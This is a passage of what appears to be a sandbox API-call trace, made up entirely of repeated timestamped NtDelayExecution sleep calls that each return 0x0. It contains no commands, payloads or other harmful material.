(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.923] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.940] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.943] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.946] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.948] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.954] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.963] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.966] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.969] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.975] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.977] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.978] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.980] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.981] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.984] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.986] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.987] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.990] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.996] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.998] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.999] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.001] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.002] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.016] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.028] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.040] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.043] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.052] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.055] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.065] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.103] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.104] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.107] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.109] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.113] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.115] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.131] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.133] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.146] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.148] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.153] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.154] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.156] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.160] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.165] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.170] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.173] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.176] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.185] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.191] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.198] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.200] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.203] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.213] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.216] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.217] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.219] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.220] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.245] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.246] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.260] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.263] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.265] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.266] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.274] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.275] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.277] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.280] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.281] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.283] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.286] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.289] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.295] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.296] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.305] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.326] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.339] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.340] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.342] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.349] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.352] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.355] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.358] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.376] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.383] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.390] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.417] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.428] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.431] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.460] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.464] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.469] NtDelayExecution 